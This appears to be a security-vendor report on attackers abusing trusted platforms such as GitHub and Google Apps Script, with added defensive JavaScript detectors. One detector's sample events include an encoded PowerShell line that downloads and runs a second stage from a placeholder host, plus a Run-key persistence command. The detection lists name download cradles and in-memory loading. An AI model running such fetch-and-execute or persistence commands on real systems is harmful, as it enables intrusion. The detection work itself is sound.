The Trust Hijack: How Cybercriminals Are Weaponizing Legitimate Platforms in 2025

A Tranchulas Analysis of the Latest Evolution in Attack Methodology
Author: Tranchulas Research Team

Executive Summary

June 2025 has witnessed a dramatic evolution in cyberattack methodology, with threat actors increasingly abandoning traditional malware infrastructure in favor of abusing legitimate platforms and services. Recent analysis reveals sophisticated campaigns leveraging GitHub repositories, Google Apps Script, and other trusted platforms to host payloads, conduct command and control operations, and evade traditional security controls [1]. This trend, dubbed “trust hijacking,” represents a fundamental shift in the threat landscape that challenges conventional security approaches.
The statistics are alarming: 84% of major cyberattacks now utilize “Living off the Land” techniques, exploiting legitimate tools and platforms rather than deploying custom malware [2]. Campaigns observed in June 2025 include the Braodo stealer abusing GitHub for payload hosting, sophisticated JavaScript employing control-flow flattening to deliver Remcos malware, and threat actors leveraging Google Apps Script for evasive phishing operations [3]. These attacks succeed because they exploit the inherent trust organizations place in legitimate platforms, making detection significantly more challenging.
The implications for enterprise security are profound. Traditional security controls designed to detect malicious infrastructure and known bad domains are rendered ineffective when attacks originate from trusted platforms like GitHub, Google, or Microsoft services. Organizations must fundamentally rethink their security strategies to address this new reality, implementing behavioral analysis, zero trust principles, and advanced threat hunting capabilities that can distinguish between legitimate and malicious use of trusted platforms.

Introduction: The New Battlefield of Trust

At Tranchulas, our red team operations have consistently revealed that the most successful attacks are those that exploit trust relationships and legitimate infrastructure. The cybersecurity landscape in June 2025 has validated this observation on an unprecedented scale, with threat actors demonstrating remarkable sophistication in weaponizing the very platforms organizations rely upon for daily operations.
The traditional cybersecurity model assumes a clear distinction between trusted and untrusted infrastructure. Organizations implement security controls based on the premise that threats originate from malicious domains, suspicious IP addresses, and known bad actors. This approach has become fundamentally flawed as cybercriminals have evolved to operate within the trusted ecosystem, leveraging legitimate platforms to conduct every phase of their attack campaigns.
The shift toward trust hijacking represents more than a tactical evolution; it constitutes a strategic transformation in how cybercriminals approach their operations. Rather than investing in expensive and easily detected malicious infrastructure, threat actors are exploiting the massive, reliable, and trusted infrastructure provided by major technology companies. This approach offers numerous advantages including improved reliability, reduced operational costs, enhanced evasion capabilities, and exploitation of organizational trust relationships.
The June 2025 attack campaigns analyzed by security researchers demonstrate the maturity and sophistication of this approach. The Braodo stealer campaign exemplifies how threat actors can leverage GitHub’s global content delivery network and trusted reputation to host malicious payloads that evade traditional security controls. The use of control-flow flattening in JavaScript attacks shows how legitimate web technologies can be weaponized to create highly evasive malware delivery mechanisms. The abuse of Google Apps Script for phishing operations demonstrates how cloud-based development platforms can be transformed into attack infrastructure.
These developments have profound implications for enterprise security strategies. Organizations that continue to rely on traditional perimeter-based security models and reputation-based filtering will find themselves increasingly vulnerable to attacks that originate from within their trusted ecosystem. The challenge extends beyond technical detection capabilities to encompass fundamental questions about how organizations balance security requirements with operational efficiency and user experience.
The trust hijacking trend also highlights the limitations of current threat intelligence approaches that focus primarily on indicators of compromise and known malicious infrastructure. When attacks leverage legitimate platforms, traditional IOCs become less relevant, and security teams must develop new approaches to threat detection and response that focus on behavioral analysis and contextual understanding of platform usage patterns.

The Anatomy of Trust Hijacking: Deconstructing Modern Attack Campaigns

GitHub as Attack Infrastructure
The abuse of GitHub for malicious purposes represents one of the most sophisticated examples of trust hijacking observed in 2025. The Braodo stealer campaign demonstrates how threat actors can leverage GitHub’s global infrastructure, trusted reputation, and legitimate functionality to create highly effective attack chains that evade traditional security controls [1].
The technical sophistication of GitHub abuse campaigns extends far beyond simple payload hosting. Threat actors have developed comprehensive methodologies that exploit multiple aspects of the platform’s functionality. Repository creation and management techniques involve establishing seemingly legitimate repositories with convincing documentation and commit histories that can pass casual inspection. Content delivery optimization leverages GitHub’s global CDN infrastructure to ensure reliable payload delivery regardless of geographic location or network conditions. Version control exploitation uses Git’s branching and tagging features to manage different payload variants and campaign iterations.
The operational security benefits of GitHub abuse are substantial and explain why this approach has become increasingly popular among sophisticated threat actors. The platform’s legitimate reputation ensures that GitHub domains are rarely blocked by corporate firewalls or security filters. The massive scale of legitimate GitHub traffic provides excellent cover for malicious activities, making detection through traffic analysis extremely challenging. The platform’s reliability and uptime guarantees ensure that attack infrastructure remains available when needed. The global accessibility of GitHub content eliminates geographic restrictions that might affect traditional command and control infrastructure.
The Braodo stealer campaign specifically demonstrates advanced techniques for exploiting GitHub’s functionality while maintaining operational security. The initial payload delivery mechanism uses carefully crafted BAT files with misleading comments designed to complicate analysis and delay detection. The multi-stage download process leverages both github.com and raw.githubusercontent.com domains to distribute different components of the attack chain. The payload obfuscation techniques include disguising executable content as image files and using custom Base64 encoding to evade signature-based detection systems.
The persistence mechanisms employed in GitHub-based attacks show remarkable sophistication in maintaining long-term access while avoiding detection. Startup folder placement ensures that malicious payloads execute automatically when systems restart. Registry modifications create additional persistence mechanisms that survive system reboots and user logouts. File system manipulation includes strategic placement of payloads in directories that are less likely to be monitored or scanned by security tools. Cleanup procedures automatically remove initial attack artifacts to reduce the forensic footprint and complicate incident response efforts.
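As an added illustration (not code from the report or from the campaign it describes), the check below applies the disguised-image observation above to fetched objects: it flags downloads from GitHub hosts whose path claims an image but whose bytes, directly or after a base64 unwrap, are a Windows executable or archive. The host list, magic signatures and sample records are my own constructed assumptions.

```javascript
// Added example, not part of the Tranchulas report: flag GitHub-hosted
// downloads whose claimed image type does not match the actual content.
// Every record below is constructed for illustration, not a real artifact.

// Hosts the campaign is said to use for staging (plus the release CDN host).
const GITHUB_HOSTS = new Set([
  "github.com", "raw.githubusercontent.com", "objects.githubusercontent.com",
]);

// Leading bytes that identify common file types.
const MAGIC = [
  { type: "png",  bytes: [0x89, 0x50, 0x4e, 0x47] },
  { type: "jpeg", bytes: [0xff, 0xd8, 0xff] },
  { type: "gif",  bytes: [0x47, 0x49, 0x46, 0x38] },
  { type: "pe",   bytes: [0x4d, 0x5a] },              // "MZ": Windows executable
  { type: "zip",  bytes: [0x50, 0x4b, 0x03, 0x04] },  // also .jar/.docx containers
];

const IMAGE_EXT = /\.(png|jpe?g|gif|bmp|ico)$/i;

function magicType(buf) {
  for (const m of MAGIC) {
    if (buf.length >= m.bytes.length && m.bytes.every((b, i) => buf[i] === b)) {
      return m.type;
    }
  }
  return "unknown";
}

// Loaders sometimes ship the payload as a base64 text blob under an image
// name; if the body looks like base64, decode it and re-check the magic.
function unwrapBase64(buf) {
  const text = buf.toString("latin1").trim();
  if (text.length < 8 || !/^[A-Za-z0-9+/=\s]+$/.test(text)) return null;
  const decoded = Buffer.from(text.replace(/\s+/g, ""), "base64");
  return decoded.length > 0 ? decoded : null;
}

// Returns a verdict for one fetched object: { url, verdict, reason }.
function assessDownload(rec) {
  const url = new URL(rec.url);
  if (!GITHUB_HOSTS.has(url.hostname)) {
    return { url: rec.url, verdict: "ignore", reason: "not a GitHub host" };
  }
  const pathLooksImage = IMAGE_EXT.test(url.pathname);
  let kind = magicType(rec.body);
  let wrapped = false;
  if (kind === "unknown") {
    const inner = unwrapBase64(rec.body);
    if (inner) { kind = magicType(inner); wrapped = true; }
  }
  if (pathLooksImage && (kind === "pe" || kind === "zip")) {
    const how = wrapped ? " (base64-wrapped)" : "";
    return { url: rec.url, verdict: "alert", reason: `image path but ${kind} content${how}` };
  }
  if (kind === "pe") {
    return { url: rec.url, verdict: "review", reason: "raw executable fetched from GitHub" };
  }
  return { url: rec.url, verdict: "ok", reason: kind };
}

function scanDownloads(records) {
  return records.map(assessDownload);
}

// Constructed sample records (repository names and bodies are invented).
const SAMPLES = [
  { url: "https://raw.githubusercontent.com/acme/site/main/img/logo.png",
    body: Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]) },
  { url: "https://raw.githubusercontent.com/acme/assets/main/icons/loader.jpg",
    body: Buffer.from([0x4d, 0x5a, 0x90, 0x00, 0x03, 0x00]) },
  { url: "https://github.com/acme/assets/raw/main/pics/banner.png",
    body: Buffer.from(Buffer.from([0x4d, 0x5a, 0x90, 0x00]).toString("base64"), "latin1") },
  { url: "https://github.com/acme/tool/releases/download/v1.0/tool.exe",
    body: Buffer.from([0x4d, 0x5a, 0x90, 0x00]) },
  { url: "https://example.invalid/cdn/photo.jpg",
    body: Buffer.from([0xff, 0xd8, 0xff, 0xe0]) },
];

for (const r of scanDownloads(SAMPLES)) {
  console.log(`${r.verdict.padEnd(6)} ${r.reason.padEnd(40)} ${r.url}`);
}
```

In production the body would come from a proxy or sandbox capture; a few hundred bytes are enough for the magic check.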
JavaScript Weaponization and Obfuscation
The evolution of JavaScript-based attacks in 2025 demonstrates how legitimate web technologies can be weaponized to create highly sophisticated and evasive malware delivery mechanisms. The control-flow flattening techniques observed in recent Remcos delivery campaigns represent a significant advancement in obfuscation technology that challenges traditional static analysis approaches [1].
Control-flow flattening is a particularly insidious form of code obfuscation that strips away the natural structure of a JavaScript program. It replaces the program's normal control flow with a dispatcher: a state machine that walks arrays of strings and numbers inside a while loop, advancing only when a computed checksum matches a predefined value. Because the real execution order is only resolved at run time, purely static analysis no longer recovers it; an analyst or tool has to emulate or execute the code, which raises analysis time and cost considerably.
The implementation of control-flow flattening in malicious JavaScript demonstrates sophisticated understanding of both programming techniques and security evasion methodologies. Self-invoking functions create isolated execution contexts that complicate debugging and analysis efforts. Array manipulation techniques use complex mathematical operations to determine execution flow, making it extremely difficult to predict program behavior without full execution. Checksum validation ensures that the obfuscated code executes correctly while preventing simple deobfuscation attempts. Loop-based execution models create performance overhead that can be used to detect analysis environments and sandbox systems.
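The following is an added example, not code from the report or from any sample it analyzes: a plain function, the same function after control-flow flattening, and two analyst helpers that recognize the dispatcher shape and recover the block order. Real obfuscators add string-array indirection and checksum gating on top; the heuristics here target the loop-plus-switch skeleton that survives those layers. Function and heuristic names are my own.

```javascript
// Added example, not part of the Tranchulas report. Shows what flattening
// does to a small function and how an analyst can spot and start undoing it.

// Plain form: a toy checksum whose control flow is obvious to read.
function checksumPlain(input) {
  let sum = 0;
  for (const ch of input) sum = (sum * 31 + ch.charCodeAt(0)) & 0xffff;
  return sum;
}

// Flattened form: each basic block becomes a case; an order string decides the
// sequence and the loop-body case jumps back to the condition block (idx = 2).
function checksumFlattened(input) {
  const order = "3|0|2|1".split("|");
  let idx = 0, sum, i;
  while (true) {
    switch (order[idx++]) {
      case "3": sum = 0; continue;
      case "0": i = 0; continue;
      case "2": if (i >= input.length) return sum; continue;
      case "1": sum = (sum * 31 + input.charCodeAt(i)) & 0xffff; i++; idx = 2; continue;
    }
    break;
  }
}

// Static heuristics for the dispatcher skeleton. Each is weak alone; together
// they are a strong hint that a script was machine-flattened.
const FLATTENING_SIGNS = [
  { name: "order string split into an array", re: /\.split\(\s*['"][|,]['"]\s*\)/ },
  { name: "endless dispatcher loop",          re: /while\s*\(\s*(true|!!\s*\[\s*\])\s*\)/ },
  { name: "switch on an advancing index",     re: /switch\s*\(\s*\w+\[\s*\w+\+\+\s*\]\s*\)/ },
  { name: "one case per block ending in continue", re: /case\s+['"]?\d+['"]?\s*:[^\n]*continue/ },
];

// Returns the names of the signs present in the source text.
function flatteningSigns(src) {
  return FLATTENING_SIGNS.filter(s => s.re.test(src)).map(s => s.name);
}

// First deobfuscation step: recover the block order from the split literal.
function extractDispatchOrder(src) {
  const m = /['"]([\d|]+)['"]\s*\.split\(\s*['"]\|['"]\s*\)/.exec(src);
  return m ? m[1].split("|") : null;
}

// Demonstration: both forms agree, and only the flattened one trips the signs.
for (const fn of [checksumPlain, checksumFlattened]) {
  const src = fn.toString();
  console.log(fn.name, fn("Remcos"), flatteningSigns(src), extractDispatchOrder(src));
}
```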
The payload delivery mechanisms employed in these JavaScript attacks show remarkable sophistication in exploiting legitimate system functionality. ActiveXObject abuse leverages Windows Script Host functionality to execute PowerShell commands without triggering traditional process monitoring alerts. WebClient object manipulation uses legitimate .NET functionality to download additional payloads from remote servers. MSBuild exploitation leverages Microsoft’s build engine to execute malicious code in a trusted context. Multi-stage execution chains distribute attack components across multiple files and processes to complicate detection and analysis.
The integration of JavaScript attacks with broader campaign infrastructure demonstrates advanced operational planning and execution capabilities. Command and control communication often leverages legitimate web services and APIs to avoid detection by network monitoring systems. Payload staging uses multiple download locations and backup mechanisms to ensure reliable delivery even if some infrastructure is discovered and blocked. Environmental awareness includes techniques for detecting analysis environments, virtual machines, and sandbox systems that might be used by security researchers. Anti-forensics capabilities include log deletion, artifact cleanup, and evidence destruction mechanisms that complicate incident response efforts.
Cloud Platform Exploitation
The abuse of cloud platforms for malicious purposes represents a particularly concerning trend that exploits the fundamental trust relationships organizations have with major technology providers. The recent campaigns leveraging Google Apps Script for phishing operations demonstrate how cloud-based development platforms can be transformed into sophisticated attack infrastructure [3].
Google Apps Script abuse campaigns show remarkable sophistication in exploiting the platform’s legitimate functionality for malicious purposes. The creation of fraudulent login pages using Google’s trusted infrastructure ensures that phishing sites benefit from the company’s reputation and security certifications. The use of Google’s global content delivery network provides reliable access to malicious content regardless of geographic location or network conditions. The integration with other Google services creates opportunities for data exfiltration and persistence that are difficult to detect using traditional monitoring approaches.
The technical implementation of cloud platform abuse demonstrates advanced understanding of both the platforms’ capabilities and their security limitations. API exploitation involves using legitimate application programming interfaces in ways that were not intended by the platform designers. Service integration leverages connections between different cloud services to create complex attack chains that span multiple platforms and providers. Authentication bypass techniques exploit weaknesses in platform security models to gain unauthorized access to resources and functionality. Data exfiltration mechanisms use legitimate data transfer capabilities to steal sensitive information without triggering traditional data loss prevention systems.
The operational advantages of cloud platform abuse extend beyond simple evasion capabilities to encompass fundamental changes in attack economics and scalability. The elimination of infrastructure costs allows threat actors to conduct large-scale campaigns without significant upfront investment. The global scalability of cloud platforms enables attacks that can reach victims worldwide without geographic limitations. The reliability and uptime guarantees provided by major cloud providers ensure that attack infrastructure remains available when needed. The legitimate appearance of cloud-based attacks makes them extremely difficult to distinguish from normal business operations.
The persistence and expansion capabilities enabled by cloud platform abuse create long-term threats that can be extremely difficult to detect and remediate. Account takeover techniques allow threat actors to gain persistent access to cloud resources using legitimate credentials. Service proliferation involves creating multiple interconnected services across different platforms to ensure continued access even if some components are discovered. Data synchronization mechanisms automatically replicate stolen information across multiple cloud storage services to prevent data loss. Backup and recovery systems ensure that attack infrastructure can be quickly restored if discovered and disrupted.

The Living Off The Land Revolution

Understanding LOTL Methodology
Living Off The Land (LOTL) attacks represent a fundamental shift in cybercriminal methodology that has reached unprecedented sophistication in 2025. The statistic that 84% of major cyberattacks now utilize LOTL techniques demonstrates how thoroughly this approach has transformed the threat landscape [2]. Rather than deploying custom malware that can be easily detected and analyzed, threat actors are weaponizing the legitimate tools and platforms that organizations rely upon for daily operations.
The core philosophy behind LOTL attacks involves exploiting the inherent trust that organizations place in legitimate software, platforms, and services. This approach offers numerous advantages over traditional malware deployment including reduced detection risk, improved reliability, enhanced persistence capabilities, and exploitation of existing trust relationships. The sophistication of modern LOTL campaigns demonstrates that threat actors have developed comprehensive methodologies for identifying, exploiting, and weaponizing legitimate functionality across the entire technology stack.
The technical implementation of LOTL attacks requires deep understanding of both target environments and the legitimate tools available within those environments. System administration tools like PowerShell, WMI, and PsExec provide powerful capabilities for system manipulation and remote access that can be leveraged for malicious purposes. Development platforms and frameworks offer opportunities for code execution and payload delivery that appear completely legitimate to security monitoring systems. Cloud services and APIs provide scalable infrastructure for command and control operations that benefit from the reputation and reliability of major technology providers.
The operational security benefits of LOTL approaches extend beyond simple evasion to encompass fundamental changes in how threat actors plan and execute their campaigns. The elimination of custom malware reduces the forensic footprint of attacks and complicates attribution efforts. The use of legitimate tools makes it extremely difficult to distinguish between authorized and unauthorized activities. The exploitation of trusted platforms ensures that attack traffic blends seamlessly with normal business operations. The leveraging of existing infrastructure eliminates the need for threat actors to maintain their own command and control systems.
PowerShell and Script-Based Attacks
PowerShell has emerged as one of the most frequently abused legitimate tools in modern cyberattacks, offering threat actors a powerful and flexible platform for conducting sophisticated operations while maintaining the appearance of legitimate system administration activities. The integration of PowerShell into Windows environments and its extensive capabilities make it an ideal target for LOTL exploitation.
The technical capabilities of PowerShell that make it attractive to threat actors are extensive and continue to expand with each new version of the platform. Remote execution capabilities allow attackers to run commands on multiple systems simultaneously without deploying additional software. Object manipulation features provide powerful tools for interacting with system components, registry entries, and network resources. Scripting functionality enables the creation of complex, multi-stage attack sequences that can adapt to different environments and conditions. Integration with .NET Framework provides access to extensive programming libraries and system functionality.
The obfuscation techniques employed in PowerShell-based attacks have reached remarkable levels of sophistication, making detection and analysis extremely challenging for security teams. Encoding mechanisms use various character sets and compression algorithms to disguise malicious commands. Variable substitution techniques create dynamic code that changes with each execution. Function aliasing replaces standard PowerShell commands with custom names that can evade signature-based detection. Reflection-based loading allows attackers to execute code directly in memory without creating files on disk.
The persistence mechanisms available through PowerShell exploitation provide threat actors with numerous options for maintaining long-term access to compromised systems. Registry modification capabilities enable the creation of persistent startup mechanisms that survive system reboots. Scheduled task creation allows for the execution of malicious code at predetermined times or in response to specific system events. WMI event subscription provides a stealthy method for triggering malicious activities based on system conditions. Service installation capabilities enable the deployment of persistent backdoors that appear as legitimate system services.
The integration of PowerShell attacks with broader campaign infrastructure demonstrates advanced operational planning and execution capabilities. Command and control communication often leverages legitimate web services and APIs to avoid detection by network monitoring systems. Payload staging uses PowerShell’s download capabilities to retrieve additional components from remote servers. Environmental reconnaissance employs PowerShell’s extensive system information gathering capabilities to profile target environments. Lateral movement techniques use PowerShell’s remote execution features to spread across network environments.
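As an added example (not code from the report), the analyzer below covers the encoding, aliasing, reflective loading and persistence behaviours described in this section from the defender's side: it decodes `-EncodedCommand` arguments in process-creation events and scores the recovered script against a small indicator list. The events, host name and indicator weights are my own constructed assumptions.

```javascript
// Added example, not part of the Tranchulas report: decode and score
// PowerShell command lines from (constructed) process-creation events.

// PowerShell encodes the script as UTF-16LE before base64; encode the same
// way to build the sample events below.
function encodeCommand(script) {
  return Buffer.from(script, "utf16le").toString("base64");
}

// Accepts the -e / -ec / -en / -enc / -EncodedCommand spellings.
function decodeEncodedCommand(cmdline) {
  const m = /-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)/i.exec(cmdline);
  return m ? Buffer.from(m[1], "base64").toString("utf16le") : null;
}

// Behaviours discussed above, with weights reflecting how specific they are.
const INDICATORS = [
  { name: "hidden window / no profile", weight: 1, re: /-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?)\b/i },
  { name: "Invoke-Expression alias",    weight: 2, re: /\b(?:iex|invoke-expression)\b/i },
  { name: "download cradle",            weight: 3, re: /\b(?:downloadstring|downloadfile|invoke-webrequest|iwr|start-bitstransfer)\b/i },
  { name: "in-memory assembly load",    weight: 3, re: /\[(?:system\.)?reflection\.assembly\]::load\b/i },
  { name: "nested base64 stage",        weight: 2, re: /frombase64string\b/i },
  { name: "Run-key persistence",        weight: 3, re: /currentversion\\run\b/i },
  { name: "scheduled-task persistence", weight: 3, re: /\b(?:register-scheduledtask|new-scheduledtask|schtasks)\b/i },
  { name: "WMI event subscription",     weight: 3, re: /\b(?:register-wmievent|__eventfilter|commandlineeventconsumer)\b/i },
];

// Scores one event over both the raw command line and the decoded script.
function analyzeEvent(ev) {
  const decoded = decodeEncodedCommand(ev.cmdline);
  const text = decoded ? `${ev.cmdline}\n${decoded}` : ev.cmdline;
  const hits = INDICATORS.filter(i => i.re.test(text));
  let score = hits.reduce((s, i) => s + i.weight, 0);
  if (decoded) score += 1;  // encoding alone is common in admin tooling: mild signal only
  const severity = score >= 6 ? "high" : score >= 3 ? "medium" : "low";
  return { pid: ev.pid, decoded, indicators: hits.map(h => h.name), score, severity };
}

// Constructed events; example.invalid is a placeholder, not a real host.
const PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe";
const EVENTS = [
  { pid: 4120, image: PS, cmdline: "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " +
      encodeCommand("IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage2.ps1')") },
  { pid: 4188, image: PS, cmdline: "powershell.exe -w hidden -enc " +
      encodeCommand("Set-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -Name Updater -Value 'C:\\Users\\Public\\update.vbs'") },
  { pid: 5002, image: PS, cmdline: "powershell.exe -NoProfile -Command \"Get-ChildItem C:\\ProgramData\\logs | Measure-Object\"" },
  { pid: 5110, image: PS, cmdline: "powershell.exe -EncodedCommand " +
      encodeCommand("Get-Service -Name Spooler | Select-Object Status") },
];

function analyzeSampleEvents() {
  return EVENTS.map(analyzeEvent);
}

for (const r of analyzeSampleEvents()) {
  console.log(r.pid, r.severity, r.score, r.indicators.join("; "), r.decoded ? `<< ${r.decoded}` : "");
}
```

The two benign events show why the decoded text, not the presence of encoding, should drive the alert: an encoded `Get-Service` scores the same as an unencoded housekeeping command.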
Legitimate Platform Integration
The integration of LOTL techniques with legitimate platforms represents the most sophisticated evolution of this attack methodology, creating hybrid approaches that combine the evasion benefits of legitimate tool abuse with the scalability and reliability of trusted infrastructure. This integration has reached unprecedented levels of sophistication in 2025, with threat actors developing comprehensive frameworks for exploiting multiple platforms simultaneously.
The strategic advantages of platform integration extend beyond simple evasion to encompass fundamental improvements in attack reliability, scalability, and persistence. Multi-platform redundancy ensures that attacks can continue even if some components are discovered and disrupted. Cross-platform data synchronization enables comprehensive data exfiltration that spans multiple services and providers. Integrated authentication mechanisms leverage single sign-on and federated identity systems to gain access to multiple resources with minimal credentials. Distributed command and control architectures use multiple platforms to create resilient communication channels that are extremely difficult to disrupt.
The technical implementation of platform integration requires sophisticated understanding of how different services interact and can be chained together to create complex attack sequences. API integration involves connecting multiple platforms through their application programming interfaces to create seamless attack workflows. Service mesh architectures use multiple interconnected platforms to distribute attack components and ensure redundancy. Data flow orchestration manages the movement of information between different platforms and services. Authentication federation leverages trust relationships between platforms to expand access beyond initial compromise points.
The operational benefits of platform integration create significant challenges for security teams attempting to detect and respond to these attacks. The distributed nature of integrated attacks makes it extremely difficult to identify all components of an attack campaign. The use of legitimate platforms for each component ensures that individual activities appear normal and authorized. The redundancy built into integrated approaches means that disrupting some components may not significantly impact overall attack effectiveness. The complexity of integrated attacks requires specialized expertise and tools that many organizations lack.

Detection and Response Challenges

Traditional Security Model Limitations
The emergence of trust hijacking and LOTL attacks has exposed fundamental limitations in traditional cybersecurity approaches that were designed for a threat landscape dominated by clearly malicious infrastructure and custom malware. Organizations that continue to rely on these traditional models find themselves increasingly vulnerable to sophisticated attacks that operate within their trusted ecosystem.
Signature-based detection systems, which form the backbone of many security programs, are rendered largely ineffective against attacks that leverage legitimate platforms and tools. These systems rely on identifying known malicious patterns, file hashes, and network indicators that simply do not exist when attacks use trusted infrastructure. The dynamic and polymorphic nature of modern LOTL attacks further complicates signature-based detection, as attack components can change with each execution while maintaining the same functional objectives.
Reputation-based filtering and blocking mechanisms face similar challenges when confronted with attacks that originate from highly trusted platforms like GitHub, Google, or Microsoft services. Organizations cannot simply block access to these platforms without severely impacting business operations, creating a fundamental tension between security and operational requirements. The global scale and legitimate usage of these platforms make it extremely difficult to distinguish between authorized and unauthorized activities using traditional reputation-based approaches.
Network-based detection systems that focus on identifying malicious traffic patterns and command and control communications struggle with attacks that leverage legitimate web services and APIs for their operations. The encryption and authentication mechanisms employed by legitimate platforms make it extremely difficult to inspect traffic content for malicious indicators. The massive volume of legitimate traffic to these platforms provides excellent cover for malicious activities, making statistical analysis and anomaly detection significantly more challenging.
Endpoint protection systems that rely on behavioral analysis of processes and file system activities face unique challenges when dealing with LOTL attacks that use legitimate system tools and processes. The challenge lies in distinguishing between authorized administrative activities and malicious exploitation of the same tools and processes. The legitimate nature of the tools being used means that traditional process monitoring and behavioral analysis approaches may not trigger alerts, allowing attacks to proceed undetected.
Behavioral Analysis Requirements
The detection of trust hijacking and LOTL attacks requires a fundamental shift toward behavioral analysis approaches that can identify malicious activities based on context, patterns, and deviations from normal operations rather than relying on known malicious indicators. This shift represents one of the most significant challenges facing cybersecurity professionals in 2025.
User behavior analytics must evolve to encompass not just traditional user activities but also the ways in which users interact with legitimate platforms and services. This includes monitoring for unusual patterns in cloud service usage, unexpected access to development platforms, and abnormal data transfer activities that might indicate compromise or misuse. The challenge lies in establishing accurate baselines for normal behavior while accounting for the legitimate variability in how different users and roles interact with these platforms.
Process behavior analysis requires sophisticated understanding of how legitimate tools and processes should behave in different contexts and environments. This includes monitoring for unusual command-line arguments, unexpected network connections, and abnormal file system activities that might indicate malicious use of legitimate tools. The development of effective process behavior analysis capabilities requires extensive knowledge of both the legitimate functionality of system tools and the ways in which they can be abused for malicious purposes.
Network behavior analysis must focus on identifying patterns and anomalies in how systems and users interact with legitimate platforms and services. This includes monitoring for unusual data transfer volumes, unexpected API usage patterns, and abnormal authentication activities that might indicate compromise or abuse. The challenge lies in developing analytical capabilities that can distinguish between legitimate business activities and malicious exploitation of the same platforms and services.
Platform-specific behavior analysis requires deep understanding of how different legitimate platforms and services are typically used within organizational environments. This includes monitoring for unusual repository activities on development platforms, unexpected script execution on cloud services, and abnormal data access patterns on collaboration platforms. The development of effective platform-specific analysis capabilities requires ongoing research and intelligence gathering about how these platforms can be abused for malicious purposes.
Advanced Threat Hunting Strategies
The complexity and sophistication of modern trust hijacking attacks require advanced threat hunting strategies that go beyond traditional indicator-based approaches to focus on behavioral patterns, contextual analysis, and proactive threat discovery. These strategies must be specifically designed to address the unique challenges posed by attacks that leverage legitimate infrastructure and tools.
Hypothesis-driven hunting approaches must incorporate understanding of how legitimate platforms and services can be abused for malicious purposes. This includes developing specific hypotheses about how threat actors might leverage different platforms for various attack objectives and then systematically searching for evidence of these activities. The effectiveness of hypothesis-driven hunting depends on maintaining current intelligence about emerging attack techniques and platform abuse methodologies.
Data correlation and analysis techniques must be capable of identifying subtle patterns and relationships that span multiple platforms, services, and time periods. This includes correlating activities across different legitimate platforms to identify coordinated attack campaigns, analyzing temporal patterns to identify staged attack sequences, and identifying relationship patterns that might indicate command and control communications or data exfiltration activities.
Threat intelligence integration must encompass not just traditional indicators of compromise but also behavioral patterns, platform abuse techniques, and contextual information about how legitimate services are being weaponized. This includes maintaining current intelligence about emerging platform abuse techniques, understanding the tactics and procedures used by different threat actor groups, and developing capabilities to rapidly adapt hunting strategies based on new intelligence.
Collaborative hunting approaches must leverage the collective knowledge and experience of security communities to identify and respond to emerging threats that leverage legitimate platforms. This includes participating in threat intelligence sharing initiatives, collaborating with platform providers to understand abuse patterns, and contributing to community knowledge about effective detection and response techniques.

Strategic Implications and Organizational Response

Zero Trust Implementation for Platform Security
The rise of trust hijacking attacks necessitates a fundamental reimagining of zero trust principles to address the unique challenges posed by attacks that leverage legitimate platforms and services. Traditional zero trust implementations focus primarily on user and device verification, but the new threat landscape requires extending these principles to encompass platform and service interactions as well.
Platform verification mechanisms must be developed to continuously validate that legitimate platforms and services are being used for authorized purposes. This includes implementing behavioral monitoring for platform interactions, establishing baseline patterns for normal platform usage, and developing alerting mechanisms for unusual or suspicious platform activities. The challenge lies in balancing security requirements with the operational flexibility that makes these platforms valuable for business operations.
Service interaction monitoring must provide comprehensive visibility into how users and systems interact with legitimate platforms and services. This includes monitoring API usage patterns, tracking data transfer activities, and analyzing authentication and authorization patterns across different platforms. The goal is to identify activities that, while individually legitimate, may collectively indicate malicious intent or compromise.
Contextual access controls must consider not just user identity and device health but also the specific ways in which legitimate platforms and services are being accessed and used. This includes implementing dynamic access controls that can adapt based on usage patterns, establishing approval workflows for high-risk platform activities, and developing automated response capabilities for suspicious platform interactions.
Continuous verification principles must be extended to encompass ongoing validation of platform and service usage throughout the duration of user sessions and activities. This includes implementing real-time monitoring of platform interactions, developing capabilities for dynamic risk assessment based on platform usage patterns, and establishing mechanisms for automatically adjusting access controls based on changing risk profiles.
Organizational Capability Development
The effective response to trust hijacking threats requires organizations to develop new capabilities and expertise that go beyond traditional cybersecurity skills and knowledge. This capability development must encompass technical, analytical, and operational domains to address the full spectrum of challenges posed by these sophisticated attacks.
Platform expertise development must ensure that security teams have deep understanding of how legitimate platforms and services function, how they can be abused for malicious purposes, and how to effectively monitor and secure their usage. This includes training security personnel on platform-specific security features, developing expertise in platform abuse techniques, and establishing relationships with platform providers for security collaboration and intelligence sharing.
Behavioral analysis capabilities must be developed to enable security teams to identify subtle patterns and anomalies that might indicate malicious platform usage. This includes training analysts in advanced data analysis techniques, developing expertise in behavioral modeling and anomaly detection, and establishing processes for continuous refinement of behavioral analysis capabilities based on emerging threats and attack techniques.
Threat hunting expertise must be expanded to encompass the unique challenges posed by attacks that leverage legitimate infrastructure and platforms. This includes developing expertise in advanced hunting techniques, establishing processes for hypothesis-driven threat discovery, and creating capabilities for proactive threat identification that can stay ahead of evolving attack methodologies.
Incident response capabilities must be adapted to address the unique challenges posed by incidents that involve legitimate platforms and services. This includes developing expertise in platform-specific forensics and investigation techniques, establishing relationships with platform providers for incident response collaboration, and creating processes for coordinating response activities across multiple platforms and services.

Conclusion: Adapting to the New Reality

The trust hijacking phenomenon observed throughout June 2025 represents more than a tactical evolution in cybercriminal methodology; it constitutes a fundamental transformation of the threat landscape that challenges the core assumptions underlying traditional cybersecurity approaches. The sophistication demonstrated in campaigns leveraging GitHub, Google Apps Script, and other legitimate platforms reveals that threat actors have successfully adapted to defensive countermeasures by weaponizing the very infrastructure organizations depend upon for daily operations.
The statistics speak to the magnitude of this transformation: with 84% of major cyberattacks now utilizing Living off the Land techniques, organizations can no longer afford to treat platform abuse as an edge case or emerging threat. This has become the dominant attack methodology, requiring immediate and comprehensive response from security teams worldwide. The campaigns analyzed in June 2025 demonstrate that threat actors have moved beyond simple platform abuse to develop sophisticated, multi-stage attack frameworks that integrate multiple legitimate services into cohesive and highly effective attack chains.
